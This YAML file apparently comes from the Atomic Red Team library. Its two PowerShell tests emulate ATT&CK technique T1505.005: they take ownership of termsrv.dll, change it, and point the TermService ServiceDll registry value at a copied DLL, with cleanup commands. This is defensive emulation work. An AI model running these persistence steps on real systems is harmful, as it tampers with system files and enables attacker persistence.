atomic-red-team/atomics/T1505.005/T1505.005.yaml

attack_technique: T1505.005
display_name: 'Server Software Component: Terminal Services DLL'
atomic_tests:
- name: Simulate Patching termsrv.dll
  auto_generated_guid: 0b2eadeb-4a64-4449-9d43-3d999f4a317b
  description: |
    Simulates patching of termsrv.dll by making a benign change to the file and replacing it with the original afterwards.
    Before we can make the modifications we need to take ownership of the file and grant ourselves the necessary permissions.
  supported_platforms:
  - windows
  executor:
    elevation_required: true
    command: |
      $termsrvDll = "C:\Windows\System32\termsrv.dll"

      $ACL = Get-Acl $termsrvDll
      $permission = "Administrators","FullControl","Allow"
      $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
      $ACL.SetAccessRule($accessRule)
      Set-Acl -Path $termsrvDll -AclObject $ACL

      Copy-Item -Path "C:\Windows\System32\termsrv.dll" -Destination "C:\Windows\System32\termsrv_backup.dll" -ErrorAction Ignore
      Add-Content -Path "C:\Windows\System32\termsrv.dll" -Value "`n" -NoNewline -ErrorAction Ignore
      Move-Item -Path "C:\Windows\System32\termsrv_backup.dll" -Destination "C:\Windows\System32\termsrv.dll" -Force -ErrorAction Ignore
    cleanup_command: |
      Move-Item -Path "C:\Windows\System32\termsrv_backup.dll" -Destination "C:\Windows\System32\termsrv.dll" -Force -ErrorAction Ignore
    name: powershell

- name: Modify Terminal Services DLL Path
  auto_generated_guid: 18136e38-0530-49b2-b309-eed173787471
  description: This atomic test simulates the modification of the ServiceDll value in HKLM\System\CurrentControlSet\services\TermService\Parameters. This technique may be leveraged by adversaries to establish persistence by loading a patched version of the DLL containing malicious code.
  supported_platforms:
  - windows
  executor:
    elevation_required: true
    command: |-
      $termsrvDll = "C:\Windows\System32\termsrv.dll"

      $ACL = Get-Acl $termsrvDll
      $permission = "Administrators","FullControl","Allow"
      $accessRule = New-Object System.Security.AccessControl.FileSystemAccessRule $permission
      $ACL.SetAccessRule($accessRule)
      Set-Acl -Path $termsrvDll -AclObject $ACL

      Copy-Item -Path $termsrvDll -Destination "$HOME\AtomicTest.dll"

      $newServiceDll = "$HOME\AtomicTest.dll"

      $registryPath = "HKLM:\System\CurrentControlSet\services\TermService\Parameters"

      # Check if the registry key exists
      if (Test-Path -Path $registryPath) {
          # Modify the ServiceDll value in the registry
          Set-ItemProperty -Path $registryPath -Name "ServiceDll" -Value $newServiceDll
          Write-Host "ServiceDll value in the registry has been updated to: $newServiceDll"
      } else {
          Write-Host "Registry key not found. Make sure the 'TermService\Parameters' key exists."
      }
    cleanup_command: Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\services\TermService\Parameters" -Name "ServiceDll" -Value "C:\Windows\System32\termsrv.dll"
    name: powershell